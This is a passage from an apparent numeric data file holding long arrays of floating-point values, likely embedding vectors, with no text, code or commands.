.0038082562,0.0044824653,0.0040949685,-0.009834474,0.0185321,0.0038518354,0.0014075114,-0.0053033177,-0.003902442,-0.026843956,-0.00020902848,0.019559387,0.0113445055,0.015448175,0.007314927,0.009561765,-0.017658083,-0.005013886,-0.009720139,-0.0031346157,-0.00007007675,0.024399811,-0.01781361,-0.031919274,-0.03210889,0.006718888,-0.0064623435,0.006431069,0.006236683,-0.009646245,0.008016954,0.000551448,0.17555311,0.010194349,-0.018183537,-0.009858852,-0.0048439396,-0.018768176,-0.013384883,0.028259832,-0.018896734,0.006123241,0.006057259,-0.015514683,-0.0075118556,0.02601332,-0.0007770415,-0.0029817906,0.0135505395,0.16261409,0.00789626,0.0035893058,0.030160805,-0.007106792,0.024343174,0.015603176,0.0020540343,-0.07627997,-0.0028140869,-0.0332288,0.025055682,0.004288694,-0.028582515,0.011180761,0.0064464025,-0.0075735427,0.005860515,0.018502535,-0.0026482975,-0.000367444,-0.026005004,-0.0133393835,-0.00043606295,-0.0050869,0.008667427,0.019917822,0.021102093,-0.014794665,-0.021607395,-0.010018469,0.008089125,0.025196709,0.0120723955,-0.010521717,0.011212711,0.00622089,0.0025731835,0.01725114,0.0034968904,0.012443119,-0.029609013,0.011820224,-0.0030219033,0.018982492,-0.023965238,-0.0053276303,-0.013063392,0.0035879673,0.008035652,-0.009131349,-0.0039733215,-0.008844866,-0.0026038615,0.0038864575,-0.00018544307,0.013875736,0.0011267769,-0.0035800359,-0.014083569,-0.0008318401,-0.004941722,0.0057610613,0.012648856,-0.0079517355,-0.012996682,-0.00096253044,-0.00652465,-0.010859278,0.015256019,0.00956968,0.0027922483,-0.0069827894,-0.02263675,-0.001355901,-0.018079394,0.0021231445,0.02191843,-0.007532288,0.00023126313,-0.003922086,-0.017220903,-0.0143357795,-0.015202128,0.0034268335,0.007346969,0.007065106,-0.023156485,-0.0057670968,0.0011423766,-0.008175336,-0.0077907024,0.0021114815,0.009566235,0.012442144,-0.010016367,0.007695353,-0.013071437,-0.011982102,-0.00020684044,-0.0015465396,-0.01019595,0.011994344,0.0058983336,-0.033946536,0.016248167,0.026792483,-0.01839289,0.0071878275,0.016574774,0.010366681,-0.029076481,-0.0057699326,-0.008893796,-0.0083763655,0.0035010765,0.03499168,0.016740216,0.001314114,0.004137674,-0.015587108,-0.010856748,-0.012867462,0.007772023,0.029272456,0.0009633515,0.019738069,0.007154919,0.009245156,0.013822663,-0.0044705663],[-0.012241723,0.008062869,-0.0041086655,-0.00870498,0.012133697,-0.0074872044,-0.004050534,0.023343632,0.0084572695,0.014902759,0.0132597005,0.027892841,-0.016852744,0.010233215,0.0063594687,0.01812405,0.0039934167,-0.021457426,-0.0028582783,-0.004186761,0.015509694,-0.010400226,0.0011202598,0.010804357,0.014665399,0.012239062,-0.0022980734,0.0022600468,-0.0022139454,-0.027427291,-0.003136744,0.014518559,0.0030200349,-0.015390515,0.00078650616,-0.017235916,0.012931135,0.0013361854,0.021080628,-0.017925384,0.00793683,0.004389251,-0.01592167,0.0045567635,-0.015708618,-0.00003658574,-0.003671768,-0.017228594,-0.011267676,0.0062724636,0.0027541155,0.004594491,0.009547953,0.0046089627,-0.0017279139,0.01409193,-0.011052107,-0.0062879175,0.021003328,0.006088447,-0.028680408,0.006602478,-0.025501117,-0.0041229036,0.01755531,-0.005747928,-0.0061631664,0.0040405295,-0.0035227744,0.0017614675,0.034760553,-0.014782009,-0.009305375,-0.0006735927,-0.0025037206,0.02144664,-0.015565891,0.01888757,-0.0046152505,-0.027325895,-0.0139474915,0.00027729402,0.007956055,-0.009535744,-0.005005946,-0.0016434401,-0.0069727586,0.0068086185,0.0008936103,-0.012999863,-0.0070629846,-0.017157534,-0.0070439926,0.0054908954,-0.006396173,0.010477924,0.0072304187,0.009038582,0.0012768059,0.011843973,-0.041634,-0.008117593,-0.025211884,0.010134465,0.0022969435,0.0049422733,-0.018186122,0.03103511,0.0018994047,-0.0014641666,-0.0059112697,-0.0024958753,0.0077946247,-0.010660619,-0.011837414,-0.0067869686,0.00462452,0.0051122815,0.0028981126,0.002778542,0.01755354,-0.02203311,0.009434122,-0.004248468,-0.020967605,-0.001470871,0.0025355495,0.009280136,-0.003528878,-0.0034811469,-0.008276216,0.03491362,-0.01529012,-0.0130328,0.0062231114,-0.021498429,-0.005346287,0.002079506,0.00936126,-0.011764671,-0.0005149759,0.0058550523,0.032741643,0.024871197,0.009379359,0.029445829,-0.0062914817,0.010969477,0.010703962,0.00078344566,-0.002261428,0.032472786,0.01586315,-0.011365721,-0.014664109,-0.008301434,-0.018336745,-0.010910353,0.0009007684,0.0074415454,-0.0062518716,-0.014383015,-0.03099224,0.023355834,-0.003801541,0.005388392,-0.009919463,0.013482968,0.0028671012,-0.026903292,0.02017038,0.038787887,-0.00033784285,-0.02073498,-0.0033491354,-0.0157603,0.018999241,-0.008165063,-0.008232718,0.004220898,-0.0042849886,0.009022431,-0.0020578357,0.0043762894,0.0100123985,0.002350536,0.02346328,0.007939712,-0.01854769,0.01546251,-0.023541559,0.009937975,-0.016839521,-0.001964774,-0.006616369,-0.0075669815,-0.032490093,0.13990079,-0.018411128,-0.01577759,-0.0066945483,-0.0003815996,-0.0070293467,0.0029871783,-0.016041858,0.0056450423,-0.03534362,0.011067464,0.007264672,-0.0040985043,0.01763279,-0.01667541,0.013340701,-0.005233664,0.028383248,-0.056231547,0.0031369145,0.022764403,-0.024361877,0.018373141,-0.0015726469,-0.0074749845,-0.028863266,-0.002616451,-0.0015874454,0.011918794,0.023476847,0.0037255941,-0.002892053,-0.015318964,0.024043279,0.010773889,-0.035759546,-0.009623201,0.009304089,-0.020069804,-0.0055309255,0.011079726,-0.006515526,-0.01975394,-0.008943924,-0.00006423649,-0.0072266604,-0.0077713593,0.009237129,-0.03411013,0.012989147,0.024377031,0.014556962,-0.011195913,0.008517126,0.027024407,-0.001408063,0.0011317708,-0.009578423,-0.0040755696,-0.008933384,-0.011689244,0.016444633,0.009829073,-0.0064614383,0.034397814,-0.013024755,-0.005082154,-0.014937802,0.009240774,0.011467458,-0.028458925,-0.007970355,-0.025301838,-0.014213672,-0.013410454,-0.006910158,-0.009193771,0.0053313207,-0.009839382,0.0061384835,0.0037999914,0.020229422,-0.010085229,-0.0033048578,-0.002404745,0.005751122,-0.025562143,-0.025755653,0.0068256212,0.010250047,-0.0028264052,0.033545613,-0.012512845,-0.0018512126,0.01914779,0.025324479,0.019370938,-0.008782932,-0.0124444645,-0.035466712,0.021919396,-0.0004000467,-0.0086516505,0.009587902,0.0074860826,0.012466153,0.003960146,-0.00006629251,-0.0012433211,0.003101258,0.020470677,0.011393976,0.014603472,-0.004156098,-0.005823558,0.021915296,-0.0036885866,0.021038648,0.0147567,0.006291379,-0.0050512203,0.0096300375,-0.011010248,0.0036096245,0.0094994,0.00021729496,-0.007677686,0.009693218,-0.008694245,0.021201557,-0.0006625976,0.0056912787,0.014772201,0.016644288,0.010303848,0.027776526,0.017614722,-0.0031821327,0.013153026,-0.0030517248,0.009901769,0.006261664,0.033308808,0.003240785,0.0067331167,-0.0015759486,-0.0033643313,-0.010430484,0.00804642,-0.0006706154,-0.011413038,0.010178743,0.0032767241,0.007112822,0.014171395,-0.014665394,0.010041989,-0.0244282,-0.009986183,-0.02123925,0.0010936733,-0.002986867,-0.003079159,0.0069948807,0.0012484348,0.022151785,-0.004028197,0.09689528,-0.0020739005,-0.0018521576,0.011159911,0.0019785014,-0.026369112,0.024994716,0.005600652,0.003350508,-0.01881224,-0.023732787,0.00037078754,-0.03142851,0.00040508376,-0.003443351,0.00048407103,-0.022049386,0.00991949,0.00012118817,-0.013805236,0.01080682,-0.018202733,-0.031306893,0.013491156,0.01101786,-0.015655532,-0.004553626,-0.005427499,0.015083473,-0.023226269,-0.013583564,-0.022569736,-0.00087493454,-0.004704456,-0.020936394,0.014251262,0.0058094948,0.008057594,0.01322111,0.012759049,-0.0033838425,-0.015006878,-0.016100092,0.013666179,-0.010841409,0.029578127,0.010791495,-0.013828342,-0.019717706,0.009601064,0.0025937953,-0.0035709837,-0.017506877,0.0146572385,-0.003826075,0.015577363,-0.0012539839,-0.024717882,-0.0064174803,-0.001278926,0.0029567133,0.019903805,-0.028162876,0.05367353,-0.013474299,0.013884259,-0.024496451,0.009020588,-0.010794287,0.010185745,-0.008463845,0.035827864,0.032046027,-0.0018518809,-0.012050575,0.0036253901,0.0045381933,-0.015767489,-0.0031287028,0.0033870882,0.0193823,0.024093505,-0.009382407,-0.001535384,-0.0046237228,-0.008298497,0.0069418955,0.006237945,0.006147407,-0.0058632833,0.01934696,0.0034556964,0.02030016,-0.019556558,-0.0042220545,-0.04133771,0.0053818333,-0.024718026,-0.004752099,-0.0010424737,-0.015512372,-0.0030629616,0.011367825,0.006340514,0.0048280237,-0.0022290482,0.0050802613,-0.012208663,0.0068211094,0.021997167,-0.02762671,-0.009729423,-0.012740159,-0.0073185265,0.01952285,-0.003314156,0.0073890104,0.008566328,-0.014347714,0.010473998,0.02084125,0.00073569414,0.0069735376,0.016602917,0.0028406554,0.028131878,-0.010981988,-0.0032167574,0.005812644,0.0171118,0.023365466,0.0028797872,-0.001877052,-0.0121417055,0.0013656677,-0.011902727,0.0065482524,-0.024525505,0.021343632,-0.00020887349,-0.005500739,0.010799083,0.0072314986,-0.00048445904,0.014318151,0.032055628,0.010268943,-0.010086792,0.018803881,-0.012709311,0.01576633,0.0024957166,0.0014656064,-0.015427692,-0.0069038053,0.00072201464,0.0014549113,0.006385883,-0.006167305,-0.0116842035,0.021090386,-0.0119386455,-0.009486983,-0.027851416,0.012772294,-0.0106494725,-0.0036152021,0.10387554,-0.009112868,-0.012234419,0.014075449,0.00034800245,0.0116364,0.015929103,0.014431114,0.009842099,0.0058833044,0.0122679705,-0.029779745,0.020525197,-0.0034256636,-0.010819987,-0.015789595,-0.00021666473,-0.009629859,-0.017362203,0.017736439,0.025004579,0.0060385163,-0.0008752667,-0.0071350276,-0.010034384,-0.00079812534,0.026403971,-0.0008458733,0.011365588,-0.0022390387,0.015227516,0.0147673525,-0.0059958636,-0.011078927,0.0071497974,0.016757915,-0.010189553,-0.012545631,0.0027938029,0.0065586884,0.023371309,0.0071801455,0.03504893,0.01796786,-0.008828761,0.0044304146,-0.030771952,0.012497058,0.009349348,-0.0031521153,-0.03692332,0.025688231,0.0113877,0.006236006,-0.009946404,-0.007924168,0.019595088,0.013831353,0.017880168,-0.007619885,0.0070054475,0.0128369685,-0.025586694,-0.0009972727,0.00014554197,-0.009880676,0.023881862,0.0017551173,0.018717777,0.008860011,0.0014511092,0.0081361765,0.0146762235,0.009365918,0.024262294,0.00806571,-0.0043297433,0.0059743435,0.025599753,-0.0032254246,-0.023714472,0.015846787,-0.0057635624,-0.0061441055,0.008322687,0.01595085,-0.014772219,0.006598083,-0.0035874052,-0.008354738,0.016251335,0.001422477,-0.020610657,0.013146683,-0.005152077,-0.0023994765,0.001494354,0.009923115,-0.0039766687,-0.0064473627,-0.008351785,-0.012862427,-0.010884621,0.029721549,-0.0074972888,-0.009944524,0.004443272,-0.0068890657,0.014417526,-0.02296244,0.003862655,-0.05950326,0.023949776,0.02391877,0.012155237,-0.0057130693,0.039640326,-0.016228765,0.024286432,-0.0039611803,0.012106946,0.009427672,-0.0024715627,-0.000939525,-0.0027901921,0.024529876,0.0037983083,0.008411588,-0.028521147,0.0040852227,-0.08117721,0.03257369,0.012787641,0.019718979,0.0041305567,-0.0013256076,0.010010931,-0.011179909,0.007001096,-0.0011417515,-0.024216868,-0.0025444853,-0.014372721,0.0121496115,0.0075767743,-0.02044043,-0.03580711,-0.0017407052,0.012327898,-0.0050435825,0.007044818,0.014490987,-0.0022566512,-0.00018495206,-0.0066781016,0.00436136,0.006907033,-0.006429279,-0.0065616556,-0.014590162,0.038231265,-0.009133774,-0.0006010544,0.01972644,-0.01931634,0.000570765,0.01663326,-0.0076499633,0.02192694,0.015227862,-0.047600444,0.006057818,0.020251403,-0.029098304,-0.0054453663,-0.0062070107,0.002382244,0.022531975,-0.018303903,-0.00899126,0.012227466,-0.0033872954,0.02246784,0.039673448,-0.00008424221,0.0020310339,0.0041411086,0.01699449,-0.011834012,-0.013942287,-0.011068711,0.023719715,-0.032746103,-0.0039352872,0.0012327955,0.0072896653,0.00012825843,0.0057579083,-0.0019718162,0.013720411,-0.019737927,0.0011200566,-0.00454987,-0.03818873,0.004311248,0.0005884473,-0.0044379495,0.008046796,-0.028200034,-0.019238755,0.03244173,0.030238438,-0.0066622235,0.00051778986,-0.013819223,-0.0308599,0.0110658575,-0.019383155,0.0062372414,-0.011019197,0.027911002,-0.010359647,0.016716773,0.0016043987,0.002725761,-0.006997386,0.029258182,0.006829923,-0.010835854,0.002277373,-0.004490407,-0.0046991794,0.028082652,0.013860513,-0.01831746,-0.00403497,-0.0006872139,0.003582404,-0.025151819,0.0000015678597,0.014310356,0.026539208,0.0002844806,0.0074193114,-0.02239401,-0.009337229,0.0017792959,0.005148756,-0.010408108,0.0051780324,0.023914928,-0.021020398,-0.007940801,-0.003470617,0.0026209408,0.02962056,0.007923037,0.017082369,0.008517519,0.012303264,0.023948755,0.0041416506,0.02367002,-0.0025390126,-0.0123353,-0.014348494,0.021342462,-0.00076951267,0.015750932,0.005599275,0.012761432,-0.011136782,0.015585979,0.0016858993,0.013828092,0.008036196,0.01671707,-0.03450994,0.016626552,-0.0032409835,0.009730522,0.0143907,-0.00049969315,-0.02628298,-0.012287374,-0.017652398,-0.010606245,-0.02923426,-0.009694546,-0.01661009,0.014648235,-0.0018357417,-0.029876292,-0.011781532,0.01697148,0.012466491,0.008820713,-0.0013663307,-0.015001105,0.0025015906,0.001945881,0.012294776,-0.010781826,0.008695844,-0.032267135,-0.0065666083,0.011641789,-0.009697449,0.039114036,0.020548128,-0.012262616,0.03236662,-0.0035195565,-0.007136071,0.00874949,-0.0011741123,-0.008380697,-0.0037326422,0.0059998473,-0.03381535,-0.009232935,-0.008600492,0.010992592,0.016944407,-0.0049564773,0.029467834,0.018510431,-0.008729438,-0.015629932,-0.026138412,0.012042276,0.012237871,-0.018315824,0.011092761,0.006399131,0.006220023,-0.017723562,0.0035909817,0.023387676,0.027262948,0.011591619,-0.024128625,0.014050785,-0.0013899374,-0.01914011,0.0026790886,-0.02211746,0.00088996685,-0.006456665,-0.0043178755,0.019214258,0.012015639,-0.003959649,0.005729406,-0.0024878082,-0.0030330513,0.0018432692,-0.0021296847,-0.013343385,-0.014494648,-0.016553087,0.006210713,-0.019157853,0.0004396839,-0.008428817,-0.0011221225,0.0066501745,-0.027598336,0.011489152,0.0068789036,-0.017654855,0.015052887,0.0024504839,-0.022939485,-0.011707428,0.0110660475,0.023127284,-0.017365629,-0.016603176,-0.015254337,0.021873444,-0.013500284,0.035190582,0.0019090767,0.046504013,-0.01397565,-0.0019579188,0.006600162,-0.03391945,0.03276193,-0.0009503811,-0.00078905403,-0.0061763013,0.026319535,-0.0467902,0.026443185,-0.017900098,-0.022726849,0.029794484,-0.004593567,0.017844329,-0.011328496,0.0008784713,0.010256713,0.0035836697,0.010668806,0.02386508,-0.029664947,0.007673997,0.015869122,0.009791956,0.012875437,0.00642814,0.0008785426,-0.0013394868,0.011377089,-0.012520334,0.003618561,-0.025700353,-0.0041404306,-0.029650545,-0.010218096,-0.023018956,-0.02568366,-0.00735991,0.00023894622,0.0049409545,-0.014632558,0.008701128,-0.01062208,-0.0059913597,0.0029159214,-0.017051399,0.008542635,-0.0001695354,-0.018289106,0.038513985,0.026731612,-0.014917784,0.0007867439,-0.012143489,-0.0029291178,-0.023333428,-0.002292114,0.0077558723,-0.015525968,-0.014705493,-0.011305968,0.003655988,0.00019096487,0.033910993,-0.010380902,-0.008999555,-0.035615202,-0.0213354,0.0018928858,-0.013458392,0.011492087,-0.005887223,-0.019738913,0.020434052,0.016904205,0.006642555,-0.00032084444,0.0005085909,-0.0005169683,0.018232252,0.004928088,0.0075378185,-0.010469721,0.016295433,-0.017457606,0.0001121757,-0.0035115313,-0.0077092373,0.018790381,0.010090371,-0.006633284,-0.00046380877,-0.0022896675,0.020352572,0.0155315185,0.021969141,0.00042283352,-0.008125392,-0.00991445,0.0075004324,0.013151472,-0.008916762,0.007707186,0.005191473,-0.03233276,0.009440775,-0.0035030486,0.0071897293,0.016081003,-0.017477315,0.00084753975,-0.023226742,-0.0067196246,0.01627648,0.016677277,-0.019493666,0.0010745196,0.027514089,0.0009818826,0.0061740363,0.022121506,-0.0011810574,-0.057921503,-0.004591673,-0.024712946,0.00057243375,0.010087073,-0.005814467,0.009092514,0.009997289,0.008969498,-0.023312565,0.0033507417,-0.023030221,0.0053891647,-0.012021129,-0.0023904042,0.0044581164,0.06487483,-0.0169637,-0.013786011,-0.00886865,-0.020697784,0.0036142995,0.018769808,0.0052984986,0.016964251,-0.004920259,-0.00024339472,0.031176427,-0.011984784,-0.0026287711,-0.0015230455,0.004144667,-0.012863499,-0.0017257989,0.012544626,-0.0026416455,-0.002096501,0.014790435,-0.016585372,-0.010778634,-0.025633382,0.021006983,-0.021527676,-0.011412933,-0.011138792,0.018784933,0.006391995,-0.01312093,0.011647112,0.002803634,-0.0024597787,-0.008003142,-0.0132763535,-0.0039176913,0.022824734,-0.012299953,0.014247824,0.006887816,-0.010946313,-0.034257993,0.019755205,-0.014499172,-0.029038504,-0.0057759737,-0.011104494,-0.022043722,-0.015540268,0.002915268,0.0016008749,-0.012574917,-0.021145485,0.022335492,0.02343847,-0.015933823,0.018780692,-0.028747004,0.00406246,0.013808113,0.015648272,0.008688702,-0.014615745,0.027093884,-0.012480471,-0.028689096,0.0097621,-0.0032516445,-0.009011163,0.016641226,-0.001574151,0.023942182,-0.014902423,0.024248332,-0.008932272,0.020103974,0.018592538,0.008652857,-0.009933319,0.01835879,-0.02581664,-0.0016008904,0.02567426,-0.022703426,-0.038644575,0.009211417,0.019414794,0.0061644213,0.008941995,-0.016214214,-0.02214196,0.00062516046,-0.0042656837,0.03995025,0.00038389995,-0.0115036545,-0.008040642,0.014466806,0.008706927,-0.032660358,0.010713998,0.0070556174,0.0009028736,0.020245414,0.030822193,-0.017615674,0.023464298,-0.010701534,0.008324762,0.01599961,0.0038584212,-0.020293236,0.004961965,-0.0003624195,-0.020558182,-0.005806425,-0.014329416,-0.015452947,0.0021474317,-0.0067524984,0.0008108864,-0.008378181,0.01118927,0.01237438,0.028574666,0.037847772,0.00816569,-0.00935044,-0.0013831381,0.01545458,0.004880198,0.0008312399,0.01753608,-0.03265874,-0.009531509,-0.009033424,-0.0021230546,-0.011177499,-0.012498242,-0.023918845,-0.009571272,-0.016195977,0.002826499,0.021771051,0.01957207,-0.011808044,0.016498486,0.008784842,-0.003855659,0.00015802245,-0.0149797555,-0.0065232636,0.016292773,0.00812886,-0.013171064,-0.019014986,-0.017096046,0.0041791084,0.0087615345,0.006638461,0.020320985,-0.007181484,-0.004770318,-0.047357146,-0.0024846643,0.032979254,0.008713438,-0.013379551,-0.014170818,0.003197102,-0.0064509064,-0.00035266878,-0.0066429065,0.027802277,0.010052277,0.013211772,0.016714834,0.00019915574,0.00020583672,-0.0020584394,-0.007604506,-0.017093863,0.003212496,-0.0042815097,-0.00868879,-0.012386573,-0.011768232,0.020528896,0.0062522017,0.006437703,-0.011857858,-0.023155177,0.0016960425,-0.028411254,-0.010221159,0.0015370664,0.011358741,0.0021084584,-0.0009226013,0.025764475,-0.0073797954,-0.0005495019,-0.0029180716,0.0003541441,-0.009062429,0.018972991,0.024909655,0.008691826,-0.03471142,0.016573548,-0.011956242,-0.009051877,-0.016039647,0.013670849,0.005421429,0.015827915,-0.0013360388,-0.012122514,-0.0037732366,-0.0074445056,-0.00048453014,-0.020758389,0.11100262,-0.020580871,0.00223507,-0.010457268,0.015045674,0.006311322,0.017776879,-0.0072146812,0.028307017,0.01827056,0.0010432523,-0.01348436,-0.0025653022,0.0058338707,-0.0030721102,-0.0044642915,-0.003256213,0.014056633,0.009695401,-0.0016008641,-0.008985077,0.014004765,-0.0010891163,-0.007140308,0.011327335,-0.022829577,0.001799881,-0.0019666685,-0.023293834,0.031204639,0.006415163,-0.033794396,0.011288636,-0.0029793961,0.024288235,-0.02443233,-0.0056399964,0.016413443,-0.021160668,-0.017356696,0.015178815,0.0162432,0.0031849567,-0.032702796,0.00024441894,0.0019373434,0.089151025,0.035663284,0.011038357,-0.004152124,0.0005826839,0.016608074,-0.0022211666,0.022176318,-0.015304337,-0.016041499,0.018003704,0.0062649446,0.01638918,-0.0029958824,0.0029345616,-0.021434106,-0.012841128,0.004723489,-0.0059566023,-0.031449422,0.00080835144,0.021803435,0.0019197835,-0.038202897,0.0045286743,-0.002472536,0.011719737,0.0010562739,-0.001080346,0.00812326,0.0013450034,0.006447844,0.0013823453,0.025917416,-0.0071566375,-0.061180167,-0.006771476,0.20752713,-0.018087057,0.022949208,-0.0005358242,-0.0012483336,-0.0064779,-0.05548933,-0.037314296,-0.012801323,-0.010039303,-0.021953866,-0.01573152,-0.0029887743,0.018858109,-0.0032446927,0.0027309852,0.0049939156,-0.045763236,-0.0013698993,-0.010343629,0.022596952,-0.021765402,0.0020772482,0.014011973,-0.020367168,0.0053273784,0.029544417,-0.009790603,-0.010499939,0.012154176,0.003809017,0.009810399,0.0079544755,-0.022958314,-0.024039643,0.012145439,0.00074024487,-0.0018656884,-0.0054754927,-0.01990914,0.007206723,0.0005639604,-0.010495592,-0.0067643668,-0.15993464,0.0064361226,-0.0036580807,-0.023332767,0.019505171,0.014322413,0.0051187244,-0.0179746,-0.0024955692,-0.006300645,-0.0070763947,-0.002994535,0.010282392,0.023089448,-0.0058126957,-0.00074484566,-0.0015052053,0.0124021815,0.012974314,0.0016875647,0.005732021,0.0043186727,-0.021513868,-0.014365831,0.024744675,-0.0062590432,-0.026707651,0.009676257,-0.015105605,0.019157425,-0.0051349704,0.016904127,-0.020156186,-0.0073650195,-0.028835779,-0.019686736,-0.03060921,0.022933912,0.010802271,-0.005578454,-0.017520603,0.008660411,-0.0041005877,0.0030847115,-0.0045756325,0.0012499252,0.006343256,0.008079282,0.009972512,0.0041037207,0.048245423,0.005127617,-0.02400425,-0.000564473,-0.00042298812,-0.00001103283,-0.011156838,-0.017490098,-0.0021444971,0.012085483,-0.012037902,-0.0039888234,-0.03396424,-0.02080312,0.022258123,-0.03413969,0.00283024,-0.025079414,0.0013847981,-0.009203132,0.00013769651,0.0028902316,0.023900623,-0.014711764,0.01058158,0.021793086,-0.010463466,0.007480017,0.0014209773,-0.0045786654,-0.016080622,-0.0097764395,-0.0075070565,-0.016394418,-0.01668922,0.0038124686,-0.010157471,0.011311293,-0.004345954,0.013632284,0.009051685,0.013063762,0.030871235,0.004092729,-0.010213546,0.009950284,0.006463898,0.0006196536,-0.027557924,0.030687913,-0.0032976042,0.006284948,-0.0028479644,0.014027809,-0.035993412,-0.0096471235,-0.024143815,-0.0012553369,-0.01340097,0.0033974643,0.0052385,0.019224362,-0.003786422,-0.031079046,-0.017315738,-0.005092464,0.041635536,0.049230598,-0.00479413,-0.0019416345,-0.016526593,-0.034921072,0.008706746,0.009805187,0.028509581,-0.03000175,-0.02104985,-0.00063627923,0.013569626,-0.018100686,0.006222638,0.01832651,-0.007838448,0.0043338,0.00038093588,-0.007916428,-0.009908514,-0.015566331,-0.0010951139,-0.0009309043,0.010135017,-0.02215636,0.001186723,-0.0075937267,0.00045708774,0.00033552313,-0.00054582284,-0.0013032071,0.013707459,-0.0141449105,-0.001781501,0.02979615,0.003565891,-0.025913997,-0.008346053,0.10797827,-0.015493649,-0.017211316,0.010719084,-0.027898362,0.015657675,0.032437008,0.00016534692,-0.014377331,-0.011732691,-0.033799965,0.00088432844,-0.0026689325,0.011290705,-0.019586198,0.021390349,-0.0014279417,-0.02864794,0.0044382154,-0.00015826456,0.0010987895,-0.022835331,-0.00527615,0.023974746,0.0027290978,-0.013909528,0.009156114,-0.021415263,-0.0029520977,-0.0039926004,-0.03351204,-0.0036051213,-0.004791743,-0.0113221025,-0.006494078,-0.047978982,0.0055309776,-0.0019485193,0.015719721,0.019004852,0.009920662,0.004554542,0.004697099,-0.026011277,-0.0013028228,0.030006824,0.006498185,0.015115285,0.012493717,0.015170518,-0.0073983325,0.012038158,0.016677616,-0.022831928,-0.027498798,-0.03837271,0.0035600867,0.011669307,0.00019828363,-0.0050746934,0.0708365,-0.01216672,0.004251407,-0.015166815,0.00029598223,0.009817304,0.012465844,0.012632488,0.016292036,0.020116294,0.0030112164,-0.015298587,0.008639074,-0.0027252487,-0.0015044792,-0.010739228,-0.036527935,-0.006406432,-0.019944897,-0.01583326,-0.0038907598,-0.002969242,0.014868655,0.01459309,-0.020324036,-0.042951133,0.0002689662,-0.003529996,-0.026512532,0.009339262,0.007778051,0.012866881,-0.00063665945,0.010507637,0.010313945,-0.027499467,-0.018303627,-0.0012181816,0.018801471,0.004273409,0.015222345,-0.0020014879,-0.0064375997,-0.010064291,-0.008730575,-0.022210628,0.030305993,-0.00019527544,-0.002904155,-0.011371765,0.0146828685,-0.0041963924,0.01698527,-0.017876439,-0.00562703,0.03454958,-0.022015352,-0.004409075,-0.0032163817,-0.020095268,-0.0029772515,-0.011572778,-0.032284927,-0.03028913,-0.004220417,-0.017930012,-0.009311575,0.0066126143,0.00015120412,-0.0038296203,-0.026216563,0.047489733,-0.0050260127,-0.00206749,0.0051797177,-0.010242335,0.033972014,-0.00842875,0.015429677,0.012145196,-0.00654019,0.006982743,-0.011049294,-0.0075220293,0.02595557,0.0037612207,-0.0023225208,-0.006078311,0.015574931,0.009283139,-0.019239139,-0.015332013,0.01023516,-0.0007108281,-0.004356365,0.004087494,-0.015483854,0.0021942898,0.018033342,-0.008862487,-0.010394133,0.0053917128,0.004139367,-0.018584756,-0.012806495,-0.005860936,0.023880228,-0.012088477,0.015103273,0.0029626847,0.014754522,-0.01839052,-0.009482579,0.014868051,-0.015865615,0.011136227,0.0072373846,-0.017680924,-0.002250676,-0.006355499,0.014539363,0.025502931,-0.030060004,0.00048719413,0.0026766201,0.0020038297,-0.0021143672,0.021948025,-0.006422676,-0.011215034,0.013855486,0.017554143,0.011725438,-0.011481829,0.0017756153,0.03038728,-0.0008342616,0.007742365,-0.008020334,0.0018113537,-0.010790298,0.024029445,-0.023607535,-0.025858555,0.0067597935,-0.0074201794,-0.014166116,0.004355481,-0.018260837,-0.005323804,-0.012512882,0.015798733,-0.0045795194,-0.03298002,0.0027842624,0.0065155593,0.006909129,-0.002138313,-0.008817597,-0.010409233,-0.00748795,-0.007868351,-0.014736321,0.013307474,-0.053531785,-0.010809267,-0.023923017,0.121822655,-0.017801784,-0.009344779,0.008148821,0.029357066,0.021303108,-0.007129192,0.0069367015,-0.00778126,-0.02113813,-0.007670218,-0.039867986,0.015480533,0.0053412733,-0.017307896,-0.01160333,-0.0010418042,0.0147878565,-0.016531933,0.0063518193,-0.0077994615,0.008251152,0.005173855,-0.019074326,-0.004831687,-0.040560383,0.0030553185,-0.0017052676,-0.016376538,0.009460583,0.0049022627,-0.002561172,0.0054977816,-0.015644176,-0.0030017998,0.007018027,0.009722241,-0.014373765,-0.038078953,0.02566511,-0.01136645,-0.002922181,-0.010275054,-0.0001741274,-0.022471469,0.014740207,0.004645626,-0.01554667,-0.0029050624,0.008138604,-0.014432874,0.02828248,0.005896269,-0.0013723713,0.017405525,0.009675602,0.0025438857,-0.024826713,0.017065888,0.019777887,-0.011854866,-0.0007293195,-0.007275236,-0.006851756,0.008585604,0.019923318,-0.0032753737,-0.005928292,-0.00854742,-0.0076308786,0.0049720313,0.047953084,-0.007691958,0.006106325,0.0046891826,-0.00020846764,0.01152245,0.013477635,0.0014295368,-0.0068447306,-0.021700712,0.03141612,-0.003536247,-0.0037045812,-0.0018779214,0.005984557,-0.011261377,-0.013588504,0.011478541,-0.007701816,0.017313847,-0.018209804,-0.009459043,0.012084826,0.017722415,-0.0076947915,0.011357915,0.029916173,0.00017940773,-0.030830776,0.026001627,0.008413446,0.0041400157,-0.023372218,0.016002875,0.0063899076,-0.094790034,0.015812567,-0.005706181,-0.020673307,0.0077513913,-0.007948888,0.0060986723,0.06968788,-0.012150352,-0.056524433,0.0018683219,0.010956382,0.030203873,0.0011024809,-0.0027701028,0.0100331465,-0.0014899237,-0.013940226,0.008574232,0.022899184,0.012388459,0.025427245,0.0033502858,-0.00021838983,-0.010224948,0.023187378,-0.00281365,-0.007517718,0.021127366,-0.0025616104,-0.0027923214,-0.0045275134,-0.008386917,0.018765632,-0.018527623,0.011441979,-0.004508077,-0.0037326894,0.0033560297,0.011015999,-0.01812042,-0.007845132,0.0036775959,0.014353034,-0.0137374345,0.022216076,0.0022077658,-0.012534663,0.0066237156,-0.019147664,-0.011790477,0.003132929,0.032540277,0.0027812067,-0.00018193125,-0.0034944525,-0.010262232,0.01284864,0.008684927,-0.016868088,0.0065618344,0.03463774,0.008176978,-0.014011954,0.0018651953,0.0066568973,0.013354248,-0.012792567,-0.011494177,-0.0064079594,-0.019149555,-0.0051025124,-0.0037420355,-0.009032479,-0.012667431,0.00050155644,0.0004013174,0.011622477,-0.00940746,0.0074789873,-0.004956649,-0.0011702369,-0.0062388484,0.024472548,-0.010080146,0.0067346594,-0.0071671237,-0.00016711299,0.009258778,0.011165326,0.008619815,0.00688241,-0.018868309,-0.01194154,-0.0072987056,0.023092303,-0.009065481,0.022976924,-0.003023574,-0.0028156398,-0.00019105722,0.0011095132,-0.012069245,-0.0075945174,-0.12765619,-0.016237235,0.016836917,-0.013524003,-0.020728232,-0.00089525443,-0.0015644605,0.0051235147,0.03159623,-0.001527467,-0.019423375,0.018710533,0.023853166,-0.0048463824,-0.01628869,-0.011129995,-0.03163091,-0.009714586,-0.0075687985,-0.00537792,0.016290871,-0.0090